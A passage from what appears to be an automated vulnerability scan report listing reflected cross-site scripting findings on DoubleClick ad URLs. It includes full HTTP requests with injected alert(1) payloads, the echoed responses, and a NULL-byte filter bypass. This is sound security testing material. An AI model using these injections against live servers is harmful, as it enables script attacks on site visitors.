Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7535
Date: Tue, 28 Jun 2011 02:09:27 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26TFN%3D8664972899%26Campaign%3D222230000010575");
var fscUrl = url;
var
...[SNIP]...

1.46. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb3ed"-alert(1)-"c4998f35407 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7500
Date: Tue, 28 Jun 2011 02:06:43 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41496831%26%26TFN%3D8664
...[SNIP]...

1.47. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac37f"-alert(1)-"bb4e6cdabfe was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7515
Date: Tue, 28 Jun 2011 02:06:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
81/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26
...[SNIP]...

1.48. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0059830"-alert(1)-"d8f92070b1e was submitted in the _pm parameter. This input was echoed as 59830"-alert(1)-"d8f92070b1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7327
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:10:01 GMT
Expires: Tue, 28 Jun 2011 02:10:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3B41422311/41440098/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=https://quote.allstate.com?quote=PQ&cid=BAC-Xplus1&att=61840000;41496760&&TFN=8664972899&Campaign=222230000010575");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.49. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1864"-alert(1)-"ddf059404d1 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7373
Date: Tue, 28 Jun 2011 02:10:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41883805%26%26TFN%3D8664972899%26Campaign%3D222230000010575");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

1.50. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1beaa'-alert(1)-'9e65c854819 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=186273951beaa'-alert(1)-'9e65c854819&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:18:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=186273951beaa'-alert(1)-'9e65c854819&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3898408" target="_blank">
...[SNIP]...

1.51. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33f5'-alert(1)-'4dfa122d9d8 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178c33f5'-alert(1)-'4dfa122d9d8&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:20:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178c33f5'-alert(1)-'4dfa122d9d8&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3998752" target="_blank">
...[SNIP]...

1.52. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe36'-alert(1)-'583b7cb77ec was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229bbe36'-alert(1)-'583b7cb77ec&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
